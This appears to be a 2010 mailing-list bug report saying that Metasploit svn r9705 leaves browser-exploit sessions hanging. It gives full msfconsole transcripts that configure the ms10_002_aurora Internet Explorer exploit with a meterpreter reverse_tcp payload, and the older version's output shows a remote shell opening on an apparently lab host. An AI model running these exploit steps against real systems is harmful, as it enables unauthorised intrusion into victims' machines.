Hello,
I updated Metasploit to svn r9705. After trying ms10_002_aurora & ms06_001_wmf_setabortproc, it appears that the session from the client browser just hangs in the established state.
Below is a comparison of the ms10_002_aurora exploit results between svn r9662 and svn r9705 (OS, Metasploit's framework and console are the same version):
root@bt:~# uname -a
Linux bt 2.6.30.9 #1 SMP Tue Dec 1 21:51:08 EST 2009 i686 GNU/Linux
msf > version
Framework: 3.4.1-dev.9625
Console : 3.4.1-dev.9652
SVN R9662
=========
msf > use windows/browser/ms10_002_aurora
msf exploit(ms10_002_aurora) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(ms10_002_aurora) > set SRVHOST 192.168.12.152
SRVHOST => 192.168.12.152
msf exploit(ms10_002_aurora) > set SRVPORT 80
SRVPORT => 80
msf exploit(ms10_002_aurora) > set URIPATH /
URIPATH => /
msf exploit(ms10_002_aurora) > set LHOST 192.168.12.152
LHOST => 192.168.12.152
msf exploit(ms10_002_aurora) > set LPORT 443
LPORT => 443
msf exploit(ms10_002_aurora) > set EXITFUNC thread
EXITFUNC => thread
msf exploit(ms10_002_aurora) > exploit
[*] Exploit running as background job.
[*] Started reverse handler on 192.168.12.152:443
[*] Using URL: http://192.168.12.152:80/
[*] Server started.
msf exploit(ms10_002_aurora) >
[*] Sending Internet Explorer "Aurora" Memory Corruption to client 192.168.13.72
[*] Sending stage (748032 bytes) to 192.168.13.72
[*] Meterpreter session 1 opened (192.168.12.152:443 -> 192.168.13.72:2257) at Wed Jul 07 05:42:37 -0400 2010
msf exploit(ms10_002_aurora) > sessions -l
Active sessions
===============
Id  Type         Information                   Connection
--  ----         -----------                   ----------
1   meterpreter  CLIENT272\offsec @ CLIENT272  192.168.12.152:443 -> 192.168.13.72:2257
SVN R9705
=========
msf > use windows/browser/ms10_002_aurora
msf exploit(ms10_002_aurora) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(ms10_002_aurora) > set SRVHOST 192.168.12.152
SRVHOST => 192.168.12.152
msf exploit(ms10_002_aurora) > set SRVPORT 80
SRVPORT => 80
msf exploit(ms10_002_aurora) > set URIPATH /
URIPATH => /
msf exploit(ms10_002_aurora) > set LHOST 192.168.12.152
LHOST => 192.168.12.152
msf exploit(ms10_002_aurora) > set LPORT 443
LPORT => 443
msf exploit(ms10_002_aurora) > set EXITFUNC thread
EXITFUNC => thread
msf exploit(ms10_002_aurora) > exploit
[*] Exploit running as background job.
[*] Using URL: http://192.168.12.152:80/
[*] Server started.
msf exploit(ms10_002_aurora) >
root@bt:~# netstat -antp
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 192.168.12.152:80 0.0.0.0:* LISTEN 5710/ruby
tcp 0 0 192.168.12.152:46506 192.168.13.72:3389 ESTABLISHED 5689/rdesktop
tcp 0 0 192.168.12.152:80 192.168.13.72:2259 ESTABLISHED 5710/ruby